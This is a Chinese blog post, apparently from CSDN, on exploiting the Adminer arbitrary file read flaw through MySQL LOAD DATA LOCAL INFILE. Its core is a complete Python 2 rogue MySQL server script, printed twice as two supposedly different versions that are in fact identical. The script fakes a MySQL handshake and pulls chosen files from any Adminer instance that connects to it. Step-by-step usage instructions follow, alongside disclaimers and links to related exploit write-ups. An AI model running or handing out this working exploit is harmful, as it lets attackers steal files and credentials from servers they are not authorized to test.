渗透测试中遇到的Adminer任意文件读取漏洞

已于 2023-05-12 15:45:41 修改
阅读量6.2k 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: mysql 数据库 php 安全漏洞 网络安全
于 2022-01-17 16:05:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45329947/article/details/122536336
版权

渗透测试中遇到的Adminer任意文件读取漏洞

免责声明:

本文章仅供学习和研究使用,严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

软件简介

Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。

漏洞原理

Adminer任意文件读取漏洞其实来源于MySQL“LOAD DATA INFILE”安全问题,Adminer4.6.3版本中已经修复了LOAD DATA LOCAL INFILE问题。

漏洞复现

在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
在这里插入图片描述

字典脚本

# -*- coding: utf-8 -*-
import socket
import os
import sys

#--------------------------------------------------------------------------------------------------------------------
port = int(sys.argv[1])
#--------------------------------------------------------------------------------------------------------------------

def mysql_get_file_content(sv, filename):
    conn, address = sv.accept()
    logpath = os.path.abspath('.') + "/log/" + address[0]
    if not os.path.exists(logpath):
        os.makedirs(logpath)
    # Conn from address)
    conn.sendall(
        "\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    conn.recv(9999)
    # auth okay
    conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    conn.recv(9999)
    # want file...
    wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
    conn.sendall(wantfile)
    content = conn.recv(9999)
    conn.close()

    if len(content) > 4:
        with open(logpath + "/" + filename.replace("/", "_").replace(":", "_"), "w") as txt:
            txt.write(content)
        return True
    else:
        return False



# 开始监听
sv = socket.socket()
sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sv.bind(("", port))
sv.listen(5)
print "Listen Begin in port "+str(port)

# 日志文件夹




# 循环监听
while True:
    filename = raw_input("请输入接下来你想读的文件名 (直接按回车退出): ")
    if filename == "":
        break
    res = mysql_get_file_content(sv, filename)
    if res:
        print "Read Success! ---> "+filename
    else:
        print "Not Found~ ---> "+filename

直接输入文件读取脚本

# -*- coding: utf-8 -*-
import socket
import os
import sys

#--------------------------------------------------------------------------------------------------------------------
port = int(sys.argv[1])
#--------------------------------------------------------------------------------------------------------------------

def mysql_get_file_content(sv, filename):
    conn, address = sv.accept()
    logpath = os.path.abspath('.') + "/log/" + address[0]
    if not os.path.exists(logpath):
        os.makedirs(logpath)
    # Conn from address)
    conn.sendall(
        "\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
    conn.recv(9999)
    # auth okay
    conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
    conn.recv(9999)
    # want file...
    wantfile = chr(len(filename) + 1) + "\x00\x00\x01\xFB" + filename
    conn.sendall(wantfile)
    content = conn.recv(9999)
    conn.close()

    if len(content) > 4:
        with open(logpath + "/" + filename.replace("/", "_").replace(":", "_"), "w") as txt:
            txt.write(content)
        return True
    else:
        return False



# 开始监听
sv = socket.socket()
sv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sv.bind(("", port))
sv.listen(5)
print "Listen Begin in port "+str(port)

# 日志文件夹




# 循环监听
while True:
    filename = raw_input("请输入接下来你想读的文件名 (直接按回车退出): ")
    if filename == "":
        break
    res = mysql_get_file_content(sv, filename)
    if res:
        print "Read Success! ---> "+filename
    else:
        print "Not Found~ ---> "+filename


这两个mysql任意文件读取脚本 一定能满足你的需求!

项目提供了两个文件,dicc和input, 一个采用字典的方式进行任意文件读取 一个采用交互式界面进行任意文件读取 不需要进入vim! 用字典直接读!命令行直接输! 结合burp intruder,直接fuzz出flag!

采用了socket的端口复用技术,防止端口被系统占用,想绑定就绑定,为所欲为! PS: 端口复用只能防止套接字关闭后被系统保留,如果端口上已经有mysql应用,则还是不能绑定​ 会爆socket.error: [Errno 10013]错误

直接输入文件绝对路径读取脚本使用方法

python2 exp_input.py port
例
python2 exp_input.py 3306

脚本运行需要使用python2环境
输入想要读取的文件绝对路径,然后回车
在这里插入图片描述
打开adminer页面输入服务器的IP,用户名密码数据库可以随便输入。然后点击登录
在这里插入图片描述
看到如下代表成功读取文件。
在这里插入图片描述
成功读取文件。
在这里插入图片描述

字典脚本使用方法

把路径字典写到dict.txt文件
在这里插入图片描述
然后运行

python2 exp_dicc.py port
例
python2 exp_dicc.py 3306

此时会进入监听,可以在命令行输入你想读的文件,然后发包即可,每次发完包需重新输入文件名 直接回车即可退出,读取成功的文件也会被计入到log文件夹
在这里插入图片描述
工具下载地址

使用抖音扫一扫关注我,带你学习网安知识,渗透实战,红队技巧。
在这里插入图片描述

免责声明:

仅限授权安全测试使用,禁止未授权非法攻击站点。本文章仅供学习和研究使用。严禁使用该文章内容对互联网其他应用进行非法操作,若将其用于非法目的,所造成的后果由您自行承担,产生的一切风险与本文作者无关,如继续阅读该文章即表明您默认遵守该内容。

网安君
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
配置文件读取绝对路径_Adminer任意文件读取漏洞复现
weixin_30014265的博客
01-31 1480
正文:943字8图预计阅读时间:3分钟简介Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdminMySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。https://www.adminer.org/#download漏洞复现在攻击机器...
mysql 任意文件读取漏洞_Adminer任意文件读取漏洞
weixin_33918358的博客
02-07 2421
软件简介官方网站:https://www.adminer.org/Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdminMySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库漏洞原理Adminer任意文件读取漏洞其实来源于MySQL“LOAD DAT...
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdminMySQL 管理客
adminer-4.7.7_Adminer_MYSQL_php_
09-28
mysql数据库管理工具adminer-4.7.7最新版。
任意文件读取/下载漏洞
最新发布
qq_68163788的博客
05-23 2408
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
mssql 数据导成文件_Adminer4.6.2任意文件读取漏洞
weixin_39866741的博客
12-16 624
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x01 前言Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类...
mysql-adminer任意文件读取
qq_51478862的博客
05-05 1186
利用条件 1.adminer(版本小于4.6.2)可以远程连接数据库,2.或者可以使靶机服务器主动连接自己的伪造的mysql服务器 原理 攻击者搭建一个伪造的mysql服务器,当有用户去连接上这个伪造的服务器时。攻击者就可以任意读取受害者的文件内容。,也就是A连接B的数据库,B可以伪造假的数据库服务读取A服务器上的文件。所以基于adminer连接的数据库可以反向利用连接自己的恶意服务器,从而达到读取任意文件的目的。 演示: 先下载好adminer,直接放在根路径即可:(攻击的服务器有adminerWeb
vulhubAdminer远程文件读取漏洞复现(CVE-2021-43008)
yougexiaojiuguan的博客
02-03 1209
漏洞复现过程的记录,也是为了方便自己查看
adminer.php 漏洞,WordPress InBoundio Marketing Plugin 1.0 /admin/partials/csv_uploader.php 文件上传漏洞...
weixin_33973572的博客
03-18 317
/admin/partials/csv_uploader.php<?php$ds = DIRECTORY_SEPARATOR; //1$storeFolder = 'uploaded_csv'; //2if (!empty($_FILES)) {$_FILES['file']['name'] = preg_replace('/[^A-Za-z0-9 _ .-]/', ...
hackthebox-admireradminer渗透 & python-library-hijacking)
冬萍子癸水
01-23 642
1、扫描 端口很常规,21进去看看有无价值文件,22可能有登录,80信息搜集 C:\root> nmap -A 10.10.10.187 Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-23 13:28 CST Nmap scan report for 10.10.10.187 (10.10.10.187) Host is up (0.41s latency). Not shown: 997 closed ports PORT STATE SE
adminer-PHP
06-20
Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持PHP4.3+,MySQL 4.1+以上的版本。 定制版更新: 本作品为分享工作室定制作品, 官方在2013-05-19发布3.7.0新版本adminer, 却没...
adminer.php
07-23
资源名称:adminer.php工具简介:Adminer是一个超轻量的MySQL管理工具,除了支持MySQL外,完整版本支持几乎所有的常见数据库。全部功能,只有一个PHP文件。几百K的体积,就有如此强大的功能。完全可以媲美phpMyAdmin ...
phpMyAdmin(LOAD DATA INFILE) 任意文件读取漏洞(测试)
cj_Hydra's Blog
04-23 1482
前言: 最近在做ctf题时发现关于mysql任意文件读取漏洞的考点非常频繁,而且一直都朦胧不清,也没去学习,在不久前的DDCTF和国赛,还有最近的Nu1lCTF都考到了这个点,利用Load data infile语法。在mysql客户端登陆mysql服务端后,客户端执行语句Load data local infile ‘/etc/passwd’ into table proc;,从而可以导致my...
phpMyAdmin 4.7.x CSRF 漏洞利用
weixin_40581617的博客
06-13 688
phpMyAdmin是个知名MySQL/MariaDB在线管理工具,phpMyAdmin团队在4.7.7版本修复了一个危害严重的CSRF漏洞(PMASA-2017-9),攻击者可以通过诱导管理员访问恶意页面,悄无声息地执行任意SQL语句。该篇文章我们将结合VulnSpy的在线phpMyAdmin环境来熟悉该漏洞的利用。在线 phpMyAdmin CSRF 演练地址:https://www.vul...
HackTheBox::Admirer
aya3t的博客
10-14 798
HackTheBox::Admirer
AdminLte 开发遇到得坑
lllooollpp的博客
11-29 7770
直奔主题~ 1.框架搭建~.net  在搭建框架得过程,想必很多人会遇到与我类似得问题   (1)就是把全量包直接导入到vs,vs直接卡死。无力回天得那种死法。 解决:在试了几次不行得情况下,就只能按照系统自带得demo引用路径整理一下需要引用得JS css .... https://download.csdn.net/download/lllooollpp/10816540 有需要...
adminLte 解决菜单栏 bug
weixin_30730151的博客
07-18 492
<ul class="sidebar-menu" data-widget="tree"> 功能菜单 点击 不隐藏第三级 子菜单。。。。在 admin.min.js 第 660 行 h.prototype.collapse 添加 b.find('.treeview-menu').css('display','none') 可解决------ 转载于:htt...
在线的数据库管理文件 adminer.php
pmlptf的博客
12-27 917
有的时候不得不使用在线的数据库管理系统 但是 如果 还在用phpMyadmin  你out了 更轻量级 更友好的数据库展示系统 adminer.php 用过一次就忘不掉 线上地址 https://www.adminer.org/  ...
centos stream 8 安装文办Adminer
06-13
您可以按照以下步骤安装文版的 Adminer: 1. 安装 phpMyAdmin ``` sudo yum install epel-release -y sudo yum install phpMyAdmin -y ``` 2. 安装文语言包 ``` sudo yum install php-gettext -y ``` 3. 下载 Adminer 文语言包 ``` sudo mkdir /usr/share/adminer/lang sudo wget -O /usr/share/adminer/lang/zh-cn.php https://www.adminer.org/static/download/4.7.8/adminer-4.7.8-en.php ``` 4. 修改 Adminer 配置文件 ``` sudo cp /usr/share/adminer/adminer.php /usr/share/adminer/index.php sudo sed -i "s/English/简体文/g" /usr/share/adminer/index.php sudo sed -i "s/\/adminer.php/\/index.php/g" /etc/httpd/conf.d/adminer.conf ``` 5. 重启 Apache 服务 ``` sudo systemctl restart httpd ``` 现在您可以通过浏览器访问 `http://your-server-ip/adminer` 来使用文版的 Adminer 了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网安君

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值